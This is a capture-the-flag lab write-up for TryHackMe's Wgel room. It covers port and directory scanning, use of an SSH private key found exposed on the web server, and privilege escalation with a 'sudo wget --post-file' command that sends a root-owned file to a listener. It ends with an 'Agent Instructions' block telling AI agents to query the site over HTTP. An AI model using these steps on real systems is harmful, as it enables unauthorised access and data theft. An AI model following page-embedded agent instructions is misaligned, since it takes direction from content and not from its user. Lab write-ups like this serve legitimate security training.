# Wgel CTF ![](/files/-MbY_hwEkqISC1BOIvTZ) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.139.244 ``` ![](/files/-MbYbliYwsua7hym23aE) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,80 * (**-oN nmap**): Saving it into a files called nmap ``` nmap -sV -sC -p 22,80 -oN nmap 10.10.139.244 ``` ![](/files/-MbYbt9XP8uYTHSc4lvV) ## Enumeration Lets visit Port 80; the Web Server. ![](/files/-MbYc2sg88uTxF59Af-q) Its a default apache2 page, I made sure to check the source code and found something interesting ![](/files/-MbYcU5XtUlrpjEw-Q6s) We now have a possible username `Jessie`, there is nothing else of interest so lets run `gobuster` to find hidden directories. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.139.244/ ``` ![](/files/-MbYctbeDv9NAeVDadto) We found a hidden directory, lets go check it out ![](/files/-MbYcz6o-a6FhnxZNHup) It is a very well made website, lets run gobuster on it in the background while we explore this webpage. ``` gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.139.244/sitemap ``` Looking at the website, most of the buttons work and are functional, we got the gobuster results, lets check them. ![](/files/-MbYf3vT6kMSyZh4aX-j) There is a `/.ssh` directory, which is really interesting, lets go see it. ![](/files/-MbYfSaR_OR0hs1o8X-L) We have an `id_rsa` file, which means that if we get the password for it with `john the ripper` and then we can login through `ssh`. Lets first open the file and then copy the contents of the file and then make our own `id_rsa` file and paste it in . ![](/files/-MbYgjZWljGMwPlkXhX8) Now lets find the password for it using `ssh2john`. ``` /usr/share/john/ssh2john.py id_rsa > id_rsa_hash ``` ![](/files/-MbYhGwbqTZC3Ba2OlA7) Oh, its looks like we do not need a password to login, so lets directly login. ``` chmod 600 id_rsa ``` ``` ssh jessie@10.10.139.244 -i id_rsa ``` ![](/files/-MbYiGnNBNIVsmN-wkj6) We are logged in. We can now read the `user.txt` file ![](/files/-MbYiaJRvQIZm_z4gaug) ## Privilege Escalation Lets run the command `sudo -l` to check what we can run as root. ``` sudo -l ``` ![](/files/-MbYiq9Z0ahkKxSgSSkr) It looks like we can run `/usr/bin/wget` as root, we can try to send the root flag file to our machine using wget as it is a command that can send files. So first we need to open a http server to receive files. ``` python3 -m http.server 8080 ``` ![](/files/-MbYkvcOkZn5Cg7isDIN) We also have to start a netcat listener ![](/files/-MbYnQ7Ri5QOg3XogjHC) Now lets use this command to send the root flag to our machine, here we cannot be sure of the root flag file name but looking at the how the user flag was named, we can guess what it is named. ``` sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.10.139.244 ``` ![](/files/-MbYnWzQK6XhZEE7DEei) After you hit enter, you get contents of a file. ![](/files/-MbYng9xuOF9RPLoBDMS) This is the root flag. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/wgel-ctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.